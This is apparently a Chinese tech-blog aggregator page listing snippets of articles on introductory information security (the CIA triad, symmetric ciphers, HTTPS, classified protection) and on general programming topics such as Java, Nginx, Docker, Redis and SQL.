    一、信息安全基础1.信息≠数据(结构化、非结构化),信息=有价值的数据2.信息三种状态:存储状态、传输状态、运行(处理)状态3.信息安全三部法:网络安全法、数据安全法、个人信息保护法4.信息安全三要素(基本属性):机密性(C)、完整性(I)、可用性(A)5.实现信息安全机密性的方法:加密、访问控制6.检查信息安全完整性的方法:哈希函数7.信息安全其他要素:不可否认性(数字签名)、可控性、认真性/真
  • 2024022702-信息安全(三)——对称密码体制 武昌库里写JAVA 面试题汇总与解析密码密码学信息安全
    单密钥系统的加密密钥和解密密钥相同,或实质上等同,即从一个易于得出另一个,如下图所示。对称密码算法(symmetriccipher):DES(DataEncryptionStandard)TripleDESIDEAAESRC5CAST-128。。。。。。分组密码算法(BlockCipher)特点明文被分为固定长度的块,即分组,分组一般为64比特,或者128比特对每个分组用相同的算法和密钥加/解密密
  • 汽车信息安全概述 Autosar汽车电子进阶 工作生活随笔信息安全autosar
    随着智能网联汽车的迅猛发展,车辆不再是简单的交通工具,而是集数据收集、处理与通信于一体的移动智能终端。然而,这一变革也使得汽车成为黑客攻击的新目标。汽车信息安全问题日益凸显,成为行业关注的焦点。本文将深入探讨汽车信息安全的重要性,介绍相关技术,并分析面临的挑战。汽车信息安全的重要性不言而喻。一方面,汽车与互联网的深度融合使得车辆控制系统可能遭受远程攻击,威胁到乘客的生命安全;另一方面,车载数据的价
  • 信息安全 python_一种基于Python的信息安全情报收集工具 weixin_39637646 信息安全python
    邵云蛟吴丽莎张凯吴屏摘要:目前,公司信息安全情报收集工作主要依靠人工方式进行。主要由运维人员每日登陆相关信息安全资讯网站或接收由绿盟、启明等安全厂商发送的信息安全情报信息,这种方式效率低下,耗时耗力。关键词:Python;终端监控;安全管理中图分类号:TP391文献标识码:A文章编号:1671-2064(2018)13-0019-01为了提升公司信息安全情报的收集效率,实时掌握网络安全态势[1],
  • 分布式id实战 kk_0910 java
    目录常用方式特征潜在问题信息安全高性能UUID雪花算法数据库生成美团Leaf方案Leaf-segment数据库方案Leaf-snowflake方案常用方式uuid雪花算法数据库主键特征全局唯一趋势递增信息安全潜在问题信息安全如果id连续递增,容易被爬虫,批量下载数据如果订单id是连续递增,容易被竞争对手推算出日交易量,这时候需要ID不规则可能泄漏本机mac地址高性能保证在高qps时候,系统也高可用
  • 中科网威加入OurBMC,共筑信创网络安全硬件生态新篇章 程序员
    近日,北京中科网威信息技术有限公司(以下简称“中科网威”)正式签署CLA(ContributorLicenseAgreement,贡献者许可协议),宣布正式加入OurBMC社区。北京中科网威信息技术有限公司成立于1999年,前身是中科院1996年成立的网威安全工作室,是我国较早从事网络安全技术研究及网络安全产品研发、生产、销售和服务的企业。作为自主可控网络信息安全综合厂商,自2011年开始,公司便
  • 低代码开发与网络信息安全:构建高效防护体系 工业甲酰苯胺 低代码网络
    随着数字化转型的加速,越来越多的企业开始关注低代码开发平台,以提高软件开发效率,缩短上市时间。然而,随之而来的网络信息安全问题也日益严峻。如何在享受低代码开发带来的便捷与高效的同时,确保网络信息安全成为企业面临的重要课题。本文将从以下几个方面探讨低代码开发与网络信息安全之间的关系,并提出相应的应对策略。低代码开发平台的安全挑战低代码开发平台在现代软件开发中越来越受欢迎,它通过简化编程过程和降低开发
  • 态势感知是什么?为何需要态势感知? 安全
    网络信息技术的发展背景之下,无论是企业还是个人对网络的依赖性不断增加,信息安全已经不再是一个传统的技术问题。态势感知应势而生,作为网络安全领域的热点,态势感知协助解决了一系列网络安全问题。什么是态势感知?事实上,态势感知是一种基于环境的、动态的、全面的洞察安全风险的能力。它以安全大数据为基础,从全局的角度,提高对安全威胁的发现识别、理解分析和处理反应能力。目的在于在大规模网络环境下,对能够引起网络
  • 等级保护是什么,为什么要做等级保护 后端
    一、什么是等级保护:等级保护是一种信息安全管理方法,用于对不同级别的信息和信息系统进行分类、评估和保护。它涉及将信息系统和信息按照其重要性和敏感性分级别,然后根据等级要求实施相应的安全措施,以确保信息的保密性、完整性和可用性。等级保护通常包括信息系统的定级、备案、安全建设、测评和监督等阶段,以确保信息系统达到特定的安全标准和法规要求。随着信息化技术的飞速发展,信息系统已经成为企业和政府机构日常运营
  • java安全入门【持续更新】 ththaiai 安全性测试web安全javajava-ee
    java安全入门概述发现一个总体学习路线:JavaWeb基础–EastJun’sBlog发现一个入门网站:https://how2j.cn/?p=50613了解了javaEEJavaEE,Java平台企业版(JavaPlatformEnterpriseEdition),之前称为Java2Platform,EnterpriseEdition(J2EE),2018年3月更名为JakartaEE(这个名
  • 什么是CISSP认证? 承制科技
    认证机构介绍CISSP(CertifiedInformationSystemSecurityProfessional,注册信息系统安全认证专家)是目前世界上权威全面的国际化信息系统安全方面的认证,由国际信息系统安全认证协会(ISC)2组织和管理,(ISC)2在全世界各地举办考试,符合考试资格的人员在通过考试后被授予CISSP认证证书。CISSP可以证明证书持有者具备了符合国际标准要求的信息安全知识
  • --initialize specified but the data directory has files in it. Aborting. 问题解决 0nePiece bug解决mysql
    当电脑输入这条命令以试图初始化数据库的时候,出现这样的错误。2023-10-23T09:04:21.258180Z0[Warning]TIMESTAMPwithimplicitDEFAULTvalueisdeprecated.Pleaseuse--explicit_defaults_for_timestampserveroption(seedocumentationformoredetails).
  • HTTPS 安全通信原理 从不中二的忧伤
    随着人们网络安全意识的提高,人们对信息的安全传输越来越重视。各大公司也逐步将网站升级成HTTPS。那么,相较于HTTP,HTTPS是怎么保证信息的安全传输的?此文介绍了HTTPS的信息安全传输原理。一、HTTP为什么不安全?HTTP是明文传输,存在三大风险:窃听风险、篡改风险、冒充风险窃听风险:由于HTTP明文传输,中间人可以轻易获取到通信内容。篡改风险:中间人可以篡改信息传输内容冒充风险:中间人
  • 云原生明星企业 Weaveworks 倒闭,Sealos 瑟瑟发抖? 人工智能
    同为云原生领域的创业者,我是否已经躲在角落里瑟瑟发抖?Mesos(Mesosphere/D2IQ)前不久刚倒下,这又来了一个,我对失败的案例尤为关心,为了不重蹈覆辙,通过仔细研究和认真思考,来谈谈我的想法。Weaveworks历程2014年:成立初期,Weaveworks完成了来自Seedcamp和YCombinator的种子轮融资,获得了数百万美元的投资。2015年:Weaveworks完成了A
  • 防御保护--信息安全概述 码上方舟 网络安全网络安全
    防御保护--信息安全概述一、网络安全的背景1.1网络安全的定义网络安全又叫网络空间安全(Cyberspace),2003年美国提出网络空间的概念,即一个由信息基础设施(包括计算机、交换机、服务器等物质实体)组成的互相依赖的网络。我国官方文件的定义,即网络空间为继海(海洋)、陆(陆地)、空(天空)、天(太空)以外的第五大人类活动领域。1.2信息安全和网络安全(1)信息安全就是数据安全,即防止任何对数
  • 信息安全-操作系统安全保护(一) learning-striving 信息安全安全网络系统安全网络安全
    一、操作系统安全概述1.1操作系统安全概念是指满足安全策略要求,具有相应的安全机制及安全功能,符合特定的安全标准,在一定约束条件下,能够抵御常见的网络安全威胁,保障自身的安全运行及资源安全根据安全功能和安全保障要求,将操作系统分成五个安全等级用户自主保护级系统审计保护级安全标记保护级结构化保护级访问验证保护级操作系统的安全可控:是指用户可以按照预期的安全要求,实现对操作系统的操作和控制,以满足用户
  • 基本数据类型和引用类型的初始值 3213213333332132 java基础
    package com.array; /** * @Description 测试初始值 * @author FuJianyong * 2015-1-22上午10:31:53 */ public class ArrayTest { ArrayTest at; String str; byte bt; short s; int i; long
  • 摘抄笔记--《编写高质量代码:改善Java程序的151个建议》 白糖_ 高质量代码
            记得3年前刚到公司,同桌同事见我无事可做就借我看《编写高质量代码:改善Java程序的151个建议》这本书,当时看了几页没上心就没研究了。到上个月在公司偶然看到,于是乎又找来看看,我的天,真是非常多的干货,对于我这种静不下心的人真是帮助莫大呀。           看完整本书,也记了不少笔记
  • 【备忘】Django 常用命令及最佳实践 dongwei_6688 django
    注意:本文基于 Django 1.8.2 版本   生成数据库迁移脚本(python 脚本) python manage.py makemigrations polls  说明:polls 是你的应用名字,运行该命令时需要根据你的应用名字进行调整   查看该次迁移需要执行的 SQL 语句(只查看语句,并不应用到数据库上): python manage.p
  • 阶乘算法之一N! 末尾有多少个零 周凡杨 java算法阶乘面试效率
                                     &n
  • spring注入servlet g21121 Spring注入
    传统的配置方法是无法将bean或属性直接注入到servlet中的,配置代理servlet亦比较麻烦,这里其实有比较简单的方法,其实就是在servlet的init()方法中加入要注入的内容: ServletContext application = getServletContext(); WebApplicationContext wac = WebApplicationContextUtil
  • Jenkins 命令行操作说明文档 510888780 centos
    假设Jenkins的URL为http://22.11.140.38:9080/jenkins/ 基本的格式为 java 基本的格式为 java -jar jenkins-cli.jar [-s JENKINS_URL] command [options][args] 下面具体介绍各个命令的作用及基本使用方法 1. &nb
  • UnicodeBlock检测中文用法 布衣凌宇 UnicodeBlock
    /**  * 判断输入的是汉字  */ public static boolean isChinese(char c) {        Character.UnicodeBlock ub = Character.UnicodeBlock.of(c);    
  • java下实现调用oracle的存储过程和函数 aijuans javaorale
    1.创建表:STOCK_PRICES     2.插入测试数据:     3.建立一个返回游标:  PKG_PUB_UTILS   4.创建和存储过程:P_GET_PRICE     5.创建函数:   6.JAVA调用存储过程返回结果集 JDBCoracle10G_INVO
  • Velocity Toolbox antlove 模板toolboxvelocity
    velocity.VelocityUtil package velocity; import org.apache.velocity.Template; import org.apache.velocity.app.Velocity; import org.apache.velocity.app.VelocityEngine; import org.apache.velocity.c
  • JAVA正则表达式匹配基础 百合不是茶 java正则表达式的匹配
      正则表达式;提高程序的性能,简化代码,提高代码的可读性,简化对字符串的操作   正则表达式的用途; 字符串的匹配 字符串的分割 字符串的查找 字符串的替换       正则表达式的验证语法     [a] //[]表示这个字符只出现一次 ,[a] 表示a只出现一
  • 是否使用EL表达式的配置 bijian1013 jspweb.xmlELEasyTemplate
            今天在开发过程中发现一个细节问题,由于前端采用EasyTemplate模板方法实现数据展示,但老是不能正常显示出来。后来发现竟是EL将我的EasyTemplate的${...}解释执行了,导致我的模板不能正常展示后台数据。         网
  • 精通Oracle10编程SQL(1-3)PLSQL基础 bijian1013 oracle数据库plsql
    --只包含执行部分的PL/SQL块 --set serveroutput off begin dbms_output.put_line('Hello,everyone!'); end; select * from emp; --包含定义部分和执行部分的PL/SQL块 declare v_ename varchar2(5); begin select
  • 【Nginx三】Nginx作为反向代理服务器 bit1129 nginx
    Nginx一个常用的功能是作为代理服务器。代理服务器通常完成如下的功能:   接受客户端请求 将请求转发给被代理的服务器 从被代理的服务器获得响应结果 把响应结果返回给客户端 实例 本文把Nginx配置成一个简单的代理服务器 对于静态的html和图片,直接从Nginx获取 对于动态的页面,例如JSP或者Servlet,Nginx则将请求转发给Res
  • Plugin execution not covered by lifecycle configuration: org.apache.maven.plugin blackproof maven报错
    转:http://stackoverflow.com/questions/6352208/how-to-solve-plugin-execution-not-covered-by-lifecycle-configuration-for-sprin   maven报错: Plugin execution not covered by lifecycle configuration:
  • 发布docker程序到marathon ronin47 docker 发布应用
    1 发布docker程序到marathon 1.1 搭建私有docker registry 1.1.1 安装docker regisry docker pull docker-registry docker run -t -p 5000:5000 docker-registry 下载docker镜像并发布到私有registry docker pull consol/tomcat-8.0
  • java-57-用两个栈实现队列&&用两个队列实现一个栈 bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; /* * Q 57 用两个栈实现队列 */ public class QueueImplementByTwoStacks { private Stack<Integer> stack1; pr
  • Nginx配置性能优化 cfyme nginx
    转载地址:http://blog.csdn.net/xifeijian/article/details/20956605   大多数的Nginx安装指南告诉你如下基础知识——通过apt-get安装,修改这里或那里的几行配置,好了,你已经有了一个Web服务器了。而且,在大多数情况下,一个常规安装的nginx对你的网站来说已经能很好地工作了。然而,如果你真的想挤压出Nginx的性能,你必
  • [JAVA图形图像]JAVA体系需要稳扎稳打,逐步推进图像图形处理技术 comsci java
         对图形图像进行精确处理,需要大量的数学工具,即使是从底层硬件模拟层开始设计,也离不开大量的数学工具包,因为我认为,JAVA语言体系在图形图像处理模块上面的研发工作,需要从开发一些基础的,类似实时数学函数构造器和解析器的软件包入手,而不是急于利用第三方代码工具来实现一个不严格的图形图像处理软件......   &nb
  • MonkeyRunner的使用 dai_lm androidMonkeyRunner
    要使用MonkeyRunner,就要学习使用Python,哎 先抄一段官方doc里的代码 作用是启动一个程序(应该是启动程序默认的Activity),然后按MENU键,并截屏 # Imports the monkeyrunner modules used by this program from com.android.monkeyrunner import MonkeyRun
  • Hadoop-- 海量文件的分布式计算处理方案 datamachine mapreducehadoop分布式计算
    csdn的一个关于hadoop的分布式处理方案,存档。 原帖:http://blog.csdn.net/calvinxiu/article/details/1506112。     Hadoop 是Google MapReduce的一个Java实现。MapReduce是一种简化的分布式编程模式,让程序自动分布到一个由普通机器组成的超大集群上并发执行。就如同ja
  • 以資料庫驗證登入 dcj3sjt126com yii
    以資料庫驗證登入 由於 Yii 內定的原始框架程式, 採用綁定在UserIdentity.php 的 demo 與 admin 帳號密碼:    public function authenticate()    {        $users=array( &nbs
  • github做webhooks:[2]php版本自动触发更新 dcj3sjt126com githubgitwebhooks
    上次已经说过了如何在github控制面板做查看url的返回信息了。这次就到了直接贴钩子代码的时候了。 工具/原料 git github 方法/步骤   在github的setting里面的webhooks里把我们的url地址填进去。   钩子更新的代码如下: error_reportin
  • Eos开发常用表达式 蕃薯耀 Eos开发Eos入门Eos开发常用表达式
    Eos开发常用表达式 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2014年8月18日 15:03:35 星期一     &
  • SpringSecurity3.X--SpEL 表达式 hanqunfeng SpringSecurity
    使用 Spring 表达式语言配置访问控制,要实现这一功能的直接方式是在<http>配置元素上添加 use-expressions 属性:   <http auto-config="true" use-expressions="true"> 这样就会在投票器中自动增加一个投票器:org.springframework
  • Redis vs Memcache IXHONG redis
    1. Redis中,并不是所有的数据都一直存储在内存中的,这是和Memcached相比一个最大的区别。 2. Redis不仅仅支持简单的k/v类型的数据,同时还提供list,set,hash等数据结构的存储。 3. Redis支持数据的备份,即master-slave模式的数据备份。 4. Redis支持数据的持久化,可以将内存中的数据保持在磁盘中,重启的时候可以再次加载进行使用。 Red
  • Python - 装饰器使用过程中的误区解读 kvhur JavaScriptjqueryhtml5css
    大家都知道装饰器是一个很著名的设计模式,经常被用于AOP(面向切面编程)的场景,较为经典的有插入日志,性能测试,事务处理,Web权限校验, Cache等。 原文链接:http://www.gbtags.com/gb/share/5563.htm Python语言本身提供了装饰器语法(@),典型的装饰器实现如下:   @function_wrapper de
  • 架构师之mybatis-----update 带case when 针对多种情况更新 nannan408 case when
    1.前言.    如题. 2. 代码.   <update id="batchUpdate" parameterType="java.util.List"> <foreach collection="list" item="list" index=&
  • Algorithm算法视频教程 栏目记者 Algorithm算法
    课程:Algorithm算法视频教程 百度网盘下载地址: http://pan.baidu.com/s/1qWFjjQW 密码: 2mji 程序写的好不好,还得看算法屌不屌!Algorithm算法博大精深。 一、课程内容: 课时1、算法的基本概念 + Sequential search 课时2、Binary search 课时3、Hash table 课时4、Algor
  • C语言算法之冒泡排序 qiufeihu c算法
    任意输入10个数字由小到大进行排序。 代码: #include <stdio.h> int main() { int i,j,t,a[11]; /*定义变量及数组为基本类型*/ for(i = 1;i < 11;i++){ scanf("%d",&a[i]); /*从键盘中输入10个数*/ } for
  • JSP异常处理 wyzuomumu Webjsp
    1.在可能发生异常的网页中通过指令将HTTP请求转发给另一个专门处理异常的网页中: <%@ page errorPage="errors.jsp"%>   2.在处理异常的网页中做如下声明: errors.jsp: <%@ page isErrorPage="true"%>,这样设置完后就可以在网页中直接访问exc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他